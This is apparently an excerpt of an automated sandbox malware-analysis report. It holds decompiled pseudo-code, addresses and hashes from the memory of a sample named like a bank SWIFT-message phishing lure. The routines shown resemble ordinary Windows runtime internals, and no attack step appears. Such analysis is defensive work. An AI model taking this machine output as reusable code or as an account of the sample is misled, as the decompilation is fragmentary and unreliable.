                                                                    						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                    						 *((char*)(_t68 + 0x29)) = _a8;
                                                                    						if(_t71 != 0) {
                                                                    							_t22 = _t68 + 0x2a; // 0x2a
                                                                    							_t64 = _t22;
                                                                    							E01916B4C(_t58, _t22, _t71,  &_v604);
                                                                    							if(_t55 != 0) {
                                                                    								_t25 = _v604 + 0x2a; // 0x2a
                                                                    								_t64 = _t25 + _t68;
                                                                    								E01916B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                    							}
                                                                    							if(E018B7D50() == 0) {
                                                                    								_t61 = 0x7ffe0384;
                                                                    							} else {
                                                                    								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    							}
                                                                    							_push(_t68);
                                                                    							_push(_v592 + 0xffffffe0);
                                                                    							_push(0x402);
                                                                    							_push( *_t61 & 0x000000ff);
                                                                    							E018D9AE0();
                                                                    						}
                                                                    					}
                                                                    					_t35 =  &_v588;
                                                                    					if( &_v588 != _t68) {
                                                                    						_t35 = L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                    					}
                                                                    					L16:
                                                                    					_pop(_t69);
                                                                    					_pop(_t72);
                                                                    					_pop(_t56);
                                                                    					return E018DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                    				}
                                                                    				_t68 = L018B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                    				if(_t68 == 0) {
                                                                    					goto L16;
                                                                    				} else {
                                                                    					_t58 = _v600;
                                                                    					_t64 = _v596;
                                                                    					goto L6;
                                                                    				}
                                                                    			}






















                                                                    0x01917016
                                                                    0x0191701e
                                                                    0x0191702b
                                                                    0x01917033
                                                                    0x01917037
                                                                    0x0191703c
                                                                    0x0191703e
                                                                    0x01917041
                                                                    0x01917045
                                                                    0x0191704a
                                                                    0x01917050
                                                                    0x01917055
                                                                    0x0191705a
                                                                    0x01917062
                                                                    0x01917062
                                                                    0x0191705a
                                                                    0x01917064
                                                                    0x01917064
                                                                    0x01917067
                                                                    0x01917071
                                                                    0x01917096
                                                                    0x0191709b
                                                                    0x019170a2
                                                                    0x019170a6
                                                                    0x019170a7
                                                                    0x019170ad
                                                                    0x019170b3
                                                                    0x019170b6
                                                                    0x019170bb
                                                                    0x019170c3
                                                                    0x019170c3
                                                                    0x019170c6
                                                                    0x019170cd
                                                                    0x019170dd
                                                                    0x019170e0
                                                                    0x019170e2
                                                                    0x019170e2
                                                                    0x019170ee
                                                                    0x01917101
                                                                    0x019170f0
                                                                    0x019170f9
                                                                    0x019170f9
                                                                    0x0191710a
                                                                    0x0191710e
                                                                    0x01917112
                                                                    0x01917117
                                                                    0x01917118
                                                                    0x01917118
                                                                    0x019170bb
                                                                    0x0191711d
                                                                    0x01917123
                                                                    0x01917131
                                                                    0x01917131
                                                                    0x01917136
                                                                    0x0191713d
                                                                    0x0191713e
                                                                    0x0191713f
                                                                    0x0191714a
                                                                    0x0191714a
                                                                    0x01917084
                                                                    0x01917088
                                                                    0x00000000
                                                                    0x0191708e
                                                                    0x0191708e
                                                                    0x01917092
                                                                    0x00000000
                                                                    0x01917092

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e837dd0d4c275e6cbadce5178162f0ddb782aa2a83d1eff9a2209bba57c41fc0
                                                                    • Instruction ID: ef463ccc67a6aa38309440e1d20965e0a0d2e3cfd38af2cf1fe30fffd4a2e735
                                                                    • Opcode Fuzzy Hash: e837dd0d4c275e6cbadce5178162f0ddb782aa2a83d1eff9a2209bba57c41fc0
                                                                    • Instruction Fuzzy Hash: C131E6726087569BC324DF6CC840A6AB7E9BFC8700F044A29F99987794E730E944C7A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E018D6DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _t39;
                                                                    				intOrPtr _t52;
                                                                    				intOrPtr _t53;
                                                                    				signed int _t59;
                                                                    				signed int _t63;
                                                                    				intOrPtr _t64;
                                                                    				intOrPtr* _t66;
                                                                    				void* _t68;
                                                                    				intOrPtr _t69;
                                                                    				signed int _t73;
                                                                    				signed int _t75;
                                                                    				intOrPtr _t77;
                                                                    				signed int _t80;
                                                                    				intOrPtr _t82;
                                                                    
                                                                    				_t68 = __edx;
                                                                    				_push(__ecx);
                                                                    				_t80 = __ecx;
                                                                    				_t75 = _a4;
                                                                    				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
                                                                    					L23:
                                                                    					asm("lock inc dword [esi+0x110]");
                                                                    					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
                                                                    						asm("lock inc dword [ecx+eax+0x4]");
                                                                    					}
                                                                    					_t39 = 0;
                                                                    					L13:
                                                                    					return _t39;
                                                                    				}
                                                                    				_t63 =  *(__ecx + 0x88);
                                                                    				_t4 = _t68 + 7; // 0xa
                                                                    				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                    				_t59 = _t4 & 0xfffffff8;
                                                                    				_v8 = _t69;
                                                                    				if(_t75 >= _t63) {
                                                                    					_t75 = _t75 % _t63;
                                                                    					L15:
                                                                    					_t69 = _v8;
                                                                    				}
                                                                    				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
                                                                    				if(_t64 == 0) {
                                                                    					L14:
                                                                    					if(E018D6EBE(_t80, _t64, _t75) != 1) {
                                                                    						goto L23;
                                                                    					}
                                                                    					goto L15;
                                                                    				}
                                                                    				asm("lock inc dword [ecx+0xc]");
                                                                    				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
                                                                    					goto L14;
                                                                    				} else {
                                                                    					_t73 = _t59;
                                                                    					asm("lock xadd [eax], edx");
                                                                    					if(_t73 + _t59 > _v8) {
                                                                    						if(_t73 <= _v8) {
                                                                    							 *(_t64 + 4) = _t73;
                                                                    						}
                                                                    						goto L14;
                                                                    					}
                                                                    					_t77 = _t73 + _t64;
                                                                    					_v8 = _t77;
                                                                    					 *_a12 = _t64;
                                                                    					_t66 = _a8;
                                                                    					if(_t66 == 0) {
                                                                    						L12:
                                                                    						_t39 = _t77;
                                                                    						goto L13;
                                                                    					}
                                                                    					_t52 =  *((intOrPtr*)(_t80 + 0x10));
                                                                    					if(_t52 != 0) {
                                                                    						_t53 = _t52 - 1;
                                                                    						if(_t53 == 0) {
                                                                    							asm("rdtsc");
                                                                    							 *_t66 = _t53;
                                                                    							L11:
                                                                    							 *(_t66 + 4) = _t73;
                                                                    							goto L12;
                                                                    						}
                                                                    						E018C6A60(_t66);
                                                                    						goto L12;
                                                                    					}
                                                                    					while(1) {
                                                                    						_t73 =  *0x7ffe0018;
                                                                    						_t82 =  *0x7FFE0014;
                                                                    						if(_t73 ==  *0x7FFE001C) {
                                                                    							break;
                                                                    						}
                                                                    						asm("pause");
                                                                    					}
                                                                    					_t66 = _a8;
                                                                    					_t77 = _v8;
                                                                    					 *_t66 = _t82;
                                                                    					goto L11;
                                                                    				}
                                                                    			}


















                                                                    0x018d6de6
                                                                    0x018d6dee
                                                                    0x018d6df1
                                                                    0x018d6df4
                                                                    0x018d6dfd
                                                                    0x019105d3
                                                                    0x019105d3
                                                                    0x019105e4
                                                                    0x019105f9
                                                                    0x019105f9
                                                                    0x019105fe
                                                                    0x018d6e96
                                                                    0x018d6e9c
                                                                    0x018d6e9c
                                                                    0x018d6e03
                                                                    0x018d6e09
                                                                    0x018d6e0c
                                                                    0x018d6e12
                                                                    0x018d6e15
                                                                    0x018d6e1b
                                                                    0x019105a1
                                                                    0x018d6eb1
                                                                    0x018d6eb1
                                                                    0x018d6eb1
                                                                    0x018d6e21
                                                                    0x018d6e2a
                                                                    0x018d6e9f
                                                                    0x018d6eab
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d6eab
                                                                    0x018d6e2c
                                                                    0x018d6e34
                                                                    0x00000000
                                                                    0x018d6e3d
                                                                    0x018d6e3d
                                                                    0x018d6e42
                                                                    0x018d6e4d
                                                                    0x019105ac
                                                                    0x019105b2
                                                                    0x019105b2
                                                                    0x00000000
                                                                    0x019105ac
                                                                    0x018d6e56
                                                                    0x018d6e59
                                                                    0x018d6e5d
                                                                    0x018d6e5f
                                                                    0x018d6e64
                                                                    0x018d6e94
                                                                    0x018d6e94
                                                                    0x00000000
                                                                    0x018d6e94
                                                                    0x018d6e6a
                                                                    0x018d6e6d
                                                                    0x019105ba
                                                                    0x019105bd
                                                                    0x019105ca
                                                                    0x019105cc
                                                                    0x018d6e91
                                                                    0x018d6e91
                                                                    0x00000000
                                                                    0x018d6e91
                                                                    0x019105c0
                                                                    0x00000000
                                                                    0x019105c0
                                                                    0x018d6e7e
                                                                    0x018d6e7e
                                                                    0x018d6e80
                                                                    0x018d6e86
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d6eba
                                                                    0x018d6eba
                                                                    0x018d6e88
                                                                    0x018d6e8b
                                                                    0x018d6e8f
                                                                    0x00000000
                                                                    0x018d6e8f

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                    • Instruction ID: 683df0ee379a7d2da3e213521b3f35ad22342439488d4436e1c364b633e0ae20
                                                                    • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                    • Instruction Fuzzy Hash: CC317031204309DFC725CF29C480AAAB7A6FF85315B38C95EE45ACB255EB31F942CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E018CA70E(intOrPtr* __ecx, char* __edx) {
                                                                    				unsigned int _v8;
                                                                    				intOrPtr* _v12;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t16;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t28;
                                                                    				char* _t33;
                                                                    				intOrPtr _t37;
                                                                    				intOrPtr _t38;
                                                                    				void* _t50;
                                                                    				intOrPtr _t52;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t52 =  *0x1987b10; // 0x0
                                                                    				_t33 = __edx;
                                                                    				_t48 = __ecx;
                                                                    				_v12 = __ecx;
                                                                    				if(_t52 == 0) {
                                                                    					 *0x1987b10 = 8;
                                                                    					 *0x1987b14 = 0x1987b0c;
                                                                    					 *0x1987b18 = 1;
                                                                    					L6:
                                                                    					_t2 = _t52 + 1; // 0x1
                                                                    					E018CA990(0x1987b10, _t2, 7);
                                                                    					asm("bts ecx, eax");
                                                                    					 *_t48 = _t52;
                                                                    					 *_t33 = 1;
                                                                    					L3:
                                                                    					_t16 = 0;
                                                                    					L4:
                                                                    					return _t16;
                                                                    				}
                                                                    				_t17 = L018CA840(__edx, __ecx, __ecx, _t52, 0x1987b10, 1, 0);
                                                                    				if(_t17 == 0xffffffff) {
                                                                    					_t37 =  *0x1987b10; // 0x0
                                                                    					_t3 = _t37 + 0x27; // 0x27
                                                                    					__eflags = _t3 >> 5 -  *0x1987b18; // 0x0
                                                                    					if(__eflags > 0) {
                                                                    						_t38 =  *0x1987b9c; // 0x0
                                                                    						_t4 = _t52 + 0x27; // 0x27
                                                                    						_v8 = _t4 >> 5;
                                                                    						_t50 = L018B4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                                    						__eflags = _t50;
                                                                    						if(_t50 == 0) {
                                                                    							_t16 = 0xc0000017;
                                                                    							goto L4;
                                                                    						}
                                                                    						 *0x1987b18 = _v8;
                                                                    						_t8 = _t52 + 7; // 0x7
                                                                    						E018DF3E0(_t50,  *0x1987b14, _t8 >> 3);
                                                                    						_t28 =  *0x1987b14; // 0x0
                                                                    						__eflags = _t28 - 0x1987b0c;
                                                                    						if(_t28 != 0x1987b0c) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                    						}
                                                                    						_t9 = _t52 + 8; // 0x8
                                                                    						 *0x1987b14 = _t50;
                                                                    						_t48 = _v12;
                                                                    						 *0x1987b10 = _t9;
                                                                    						goto L6;
                                                                    					}
                                                                    					 *0x1987b10 = _t37 + 8;
                                                                    					goto L6;
                                                                    				}
                                                                    				 *__ecx = _t17;
                                                                    				 *_t33 = 0;
                                                                    				goto L3;
                                                                    			}
















                                                                    0x018ca713
                                                                    0x018ca714
                                                                    0x018ca717
                                                                    0x018ca71d
                                                                    0x018ca720
                                                                    0x018ca722
                                                                    0x018ca727
                                                                    0x018ca74a
                                                                    0x018ca754
                                                                    0x018ca75e
                                                                    0x018ca768
                                                                    0x018ca76a
                                                                    0x018ca773
                                                                    0x018ca78b
                                                                    0x018ca790
                                                                    0x018ca792
                                                                    0x018ca741
                                                                    0x018ca741
                                                                    0x018ca743
                                                                    0x018ca749
                                                                    0x018ca749
                                                                    0x018ca732
                                                                    0x018ca73a
                                                                    0x018ca797
                                                                    0x018ca79d
                                                                    0x018ca7a3
                                                                    0x018ca7a9
                                                                    0x018ca7b6
                                                                    0x018ca7bc
                                                                    0x018ca7ca
                                                                    0x018ca7e0
                                                                    0x018ca7e2
                                                                    0x018ca7e4
                                                                    0x01909bf2
                                                                    0x00000000
                                                                    0x01909bf2
                                                                    0x018ca7ed
                                                                    0x018ca7f2
                                                                    0x018ca800
                                                                    0x018ca805
                                                                    0x018ca80d
                                                                    0x018ca812
                                                                    0x01909c08
                                                                    0x01909c08
                                                                    0x018ca818
                                                                    0x018ca81b
                                                                    0x018ca821
                                                                    0x018ca824
                                                                    0x00000000
                                                                    0x018ca824
                                                                    0x018ca7ae
                                                                    0x00000000
                                                                    0x018ca7ae
                                                                    0x018ca73c
                                                                    0x018ca73e
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 19920398f5dbd17acde6ccf82952131425b15dcbd1f06e09498facf42d218b44
                                                                    • Instruction ID: 865e1e392e7722b7c2819f321b5b1fb89eed65c9ff3b00d93527b2477602b70a
                                                                    • Opcode Fuzzy Hash: 19920398f5dbd17acde6ccf82952131425b15dcbd1f06e09498facf42d218b44
                                                                    • Instruction Fuzzy Hash: EC31C4B1604209DFD729CF98D880F697BFAFB85B10F240959E259D7344E770DA01CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E018C61A0(signed int* __ecx) {
                                                                    				intOrPtr _v8;
                                                                    				char _v12;
                                                                    				intOrPtr* _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr _t31;
                                                                    				void* _t32;
                                                                    				intOrPtr _t33;
                                                                    				intOrPtr _t37;
                                                                    				intOrPtr _t49;
                                                                    				signed int _t51;
                                                                    				intOrPtr _t52;
                                                                    				signed int _t54;
                                                                    				void* _t59;
                                                                    				signed int* _t61;
                                                                    				intOrPtr* _t64;
                                                                    
                                                                    				_t61 = __ecx;
                                                                    				_v12 = 0;
                                                                    				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                    				_v16 = __ecx;
                                                                    				_v8 = 0;
                                                                    				if(_t30 == 0) {
                                                                    					L6:
                                                                    					_t31 = 0;
                                                                    					L7:
                                                                    					return _t31;
                                                                    				}
                                                                    				_t32 = _t30 + 0x5d8;
                                                                    				if(_t32 == 0) {
                                                                    					goto L6;
                                                                    				}
                                                                    				_t59 = _t32 + 0x30;
                                                                    				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                    					goto L6;
                                                                    				}
                                                                    				if(__ecx != 0) {
                                                                    					 *((intOrPtr*)(__ecx)) = 0;
                                                                    					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                    					_t51 =  *(_t32 + 0x10);
                                                                    					_t33 = _t32 + 0x10;
                                                                    					_v20 = _t33;
                                                                    					_t54 =  *(_t33 + 4);
                                                                    					if((_t51 | _t54) == 0) {
                                                                    						_t37 = E018C5E50(0x18767cc, 0, 0,  &_v12);
                                                                    						if(_t37 != 0) {
                                                                    							goto L6;
                                                                    						}
                                                                    						_t52 = _v8;
                                                                    						asm("lock cmpxchg8b [esi]");
                                                                    						_t64 = _v16;
                                                                    						_t49 = _t37;
                                                                    						_v20 = 0;
                                                                    						if(_t37 == 0) {
                                                                    							if(_t64 != 0) {
                                                                    								 *_t64 = _v12;
                                                                    								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                    							}
                                                                    							E01969D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                    							_t31 = 1;
                                                                    							goto L7;
                                                                    						}
                                                                    						E0189F7C0(_t52, _v12, _t52, 0);
                                                                    						if(_t64 != 0) {
                                                                    							 *_t64 = _t49;
                                                                    							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                    						}
                                                                    						L12:
                                                                    						_t31 = 1;
                                                                    						goto L7;
                                                                    					}
                                                                    					if(_t61 != 0) {
                                                                    						 *_t61 = _t51;
                                                                    						_t61[1] = _t54;
                                                                    					}
                                                                    					goto L12;
                                                                    				} else {
                                                                    					goto L6;
                                                                    				}
                                                                    			}



















                                                                    0x018c61b3
                                                                    0x018c61b5
                                                                    0x018c61bd
                                                                    0x018c61c3
                                                                    0x018c61c7
                                                                    0x018c61d2
                                                                    0x018c61ff
                                                                    0x018c61ff
                                                                    0x018c6201
                                                                    0x018c6207
                                                                    0x018c6207
                                                                    0x018c61d4
                                                                    0x018c61d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c61df
                                                                    0x018c61e2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c61e6
                                                                    0x018c61e8
                                                                    0x018c61ee
                                                                    0x018c61ee
                                                                    0x018c61f9
                                                                    0x0190762f
                                                                    0x01907632
                                                                    0x01907635
                                                                    0x01907639
                                                                    0x01907640
                                                                    0x0190766e
                                                                    0x01907675
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907681
                                                                    0x01907689
                                                                    0x0190768d
                                                                    0x01907691
                                                                    0x01907695
                                                                    0x01907699
                                                                    0x019076af
                                                                    0x019076b5
                                                                    0x019076b7
                                                                    0x019076b7
                                                                    0x019076d7
                                                                    0x019076dc
                                                                    0x00000000
                                                                    0x019076dc
                                                                    0x019076a2
                                                                    0x019076a9
                                                                    0x01907651
                                                                    0x01907653
                                                                    0x01907653
                                                                    0x01907656
                                                                    0x01907656
                                                                    0x00000000
                                                                    0x01907656
                                                                    0x01907644
                                                                    0x01907646
                                                                    0x01907648
                                                                    0x01907648
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e2dda8fc6c299023e76638ee67f4ae62f8af3eeb1fece907aa299e9d59ae03c
                                                                    • Instruction ID: b374890dc58ef568fb0060225c1a7184ed8f9458bd72219f757915fcb25152b9
                                                                    • Opcode Fuzzy Hash: 3e2dda8fc6c299023e76638ee67f4ae62f8af3eeb1fece907aa299e9d59ae03c
                                                                    • Instruction Fuzzy Hash: 47317C716057018FE325CF5DC840B26BBE9FB88B10F15496EE999D7391E770E904CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E0189AA16(signed short* __ecx) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v12;
                                                                    				signed short _v16;
                                                                    				intOrPtr _v20;
                                                                    				signed short _v24;
                                                                    				signed short _v28;
                                                                    				void* _v32;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t25;
                                                                    				signed short _t38;
                                                                    				signed short* _t42;
                                                                    				signed int _t44;
                                                                    				signed short* _t52;
                                                                    				signed short _t53;
                                                                    				signed int _t54;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t54;
                                                                    				_t42 = __ecx;
                                                                    				_t44 =  *__ecx & 0x0000ffff;
                                                                    				_t52 =  &(__ecx[2]);
                                                                    				_t51 = _t44 + 2;
                                                                    				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                    					L4:
                                                                    					_t25 =  *0x1987b9c; // 0x0
                                                                    					_t53 = L018B4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                    					__eflags = _t53;
                                                                    					if(_t53 == 0) {
                                                                    						L3:
                                                                    						return E018DB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                    					} else {
                                                                    						E018DF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                    						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                    						L2:
                                                                    						_t51 = 4;
                                                                    						if(L018A6C59(_t53, _t51, _t58) != 0) {
                                                                    							_t28 = E018C5E50(0x187c338, 0, 0,  &_v32);
                                                                    							__eflags = _t28;
                                                                    							if(_t28 == 0) {
                                                                    								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                    								__eflags = _t38;
                                                                    								_v24 = _t53;
                                                                    								_v16 = _t38;
                                                                    								_v20 = 0;
                                                                    								_v12 = 0;
                                                                    								E018CB230(_v32, _v28, 0x187c2d8, 1,  &_v24);
                                                                    								_t28 = E0189F7A0(_v32, _v28);
                                                                    							}
                                                                    							__eflags = _t53 -  *_t52;
                                                                    							if(_t53 !=  *_t52) {
                                                                    								_t28 = L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                    							}
                                                                    						}
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				_t53 =  *_t52;
                                                                    				_t44 = _t44 >> 1;
                                                                    				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                    				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                    					goto L4;
                                                                    				}
                                                                    				goto L2;
                                                                    			}




















                                                                    0x0189aa25
                                                                    0x0189aa29
                                                                    0x0189aa2d
                                                                    0x0189aa30
                                                                    0x0189aa37
                                                                    0x0189aa3c
                                                                    0x018f4458
                                                                    0x018f4458
                                                                    0x018f4472
                                                                    0x018f4474
                                                                    0x018f4476
                                                                    0x0189aa64
                                                                    0x0189aa74
                                                                    0x018f447c
                                                                    0x018f4483
                                                                    0x018f4492
                                                                    0x0189aa52
                                                                    0x0189aa54
                                                                    0x0189aa5e
                                                                    0x018f44a8
                                                                    0x018f44ad
                                                                    0x018f44af
                                                                    0x018f44b6
                                                                    0x018f44b6
                                                                    0x018f44b9
                                                                    0x018f44bc
                                                                    0x018f44cd
                                                                    0x018f44d3
                                                                    0x018f44d6
                                                                    0x018f44e1
                                                                    0x018f44e1
                                                                    0x018f44e6
                                                                    0x018f44e8
                                                                    0x018f44fb
                                                                    0x018f44fb
                                                                    0x018f44e8
                                                                    0x00000000
                                                                    0x0189aa5e
                                                                    0x018f4476
                                                                    0x0189aa42
                                                                    0x0189aa46
                                                                    0x0189aa48
                                                                    0x0189aa4c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 849be5b40bd74deaa9172c59144972b32647bb34b70a6fa3cd3585fe1a4d9dee
                                                                    • Instruction ID: cc45425e9a353f23b6fca8f65ef3eab8ee1fc2b05c6a96234e79a15140d54800
                                                                    • Opcode Fuzzy Hash: 849be5b40bd74deaa9172c59144972b32647bb34b70a6fa3cd3585fe1a4d9dee
                                                                    • Instruction Fuzzy Hash: 7A31C371A0021AABDF159F68CD81ABFB7B9EF14700F05406EF905E7250E7789B11DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E018D8EC7(void* __ecx, void* __edx) {
                                                                    				signed int _v8;
                                                                    				signed int* _v16;
                                                                    				intOrPtr _v20;
                                                                    				signed int* _v24;
                                                                    				char* _v28;
                                                                    				signed int* _v32;
                                                                    				intOrPtr _v36;
                                                                    				signed int* _v40;
                                                                    				signed int* _v44;
                                                                    				signed int* _v48;
                                                                    				intOrPtr _v52;
                                                                    				signed int* _v56;
                                                                    				signed int* _v60;
                                                                    				signed int* _v64;
                                                                    				intOrPtr _v68;
                                                                    				signed int* _v72;
                                                                    				char* _v76;
                                                                    				signed int* _v80;
                                                                    				signed int _v84;
                                                                    				signed int* _v88;
                                                                    				intOrPtr _v92;
                                                                    				signed int* _v96;
                                                                    				intOrPtr _v100;
                                                                    				signed int* _v104;
                                                                    				signed int* _v108;
                                                                    				char _v140;
                                                                    				signed int _v144;
                                                                    				signed int _v148;
                                                                    				signed int* _v152;
                                                                    				char _v156;
                                                                    				signed int* _v160;
                                                                    				char _v164;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t67;
                                                                    				intOrPtr _t70;
                                                                    				void* _t71;
                                                                    				void* _t72;
                                                                    				signed int _t73;
                                                                    
                                                                    				_t69 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t73;
                                                                    				_t48 =  *[fs:0x30];
                                                                    				_t72 = __edx;
                                                                    				_t71 = __ecx;
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                                    					_t48 = E018C4E70(0x19886e4, 0x18d9490, 0, 0);
                                                                    					if( *0x19853e8 > 5 && E018D8F33(0x19853e8, 0, 0x2000) != 0) {
                                                                    						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                                    						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                                    						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                                    						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                                    						_v108 =  &_v84;
                                                                    						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                                    						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                                    						_v76 =  &_v156;
                                                                    						_t70 = 8;
                                                                    						_v60 =  &_v144;
                                                                    						_t67 = 4;
                                                                    						_v44 =  &_v148;
                                                                    						_v152 = 0;
                                                                    						_v160 = 0;
                                                                    						_v104 = 0;
                                                                    						_v100 = 2;
                                                                    						_v96 = 0;
                                                                    						_v88 = 0;
                                                                    						_v80 = 0;
                                                                    						_v72 = 0;
                                                                    						_v68 = _t70;
                                                                    						_v64 = 0;
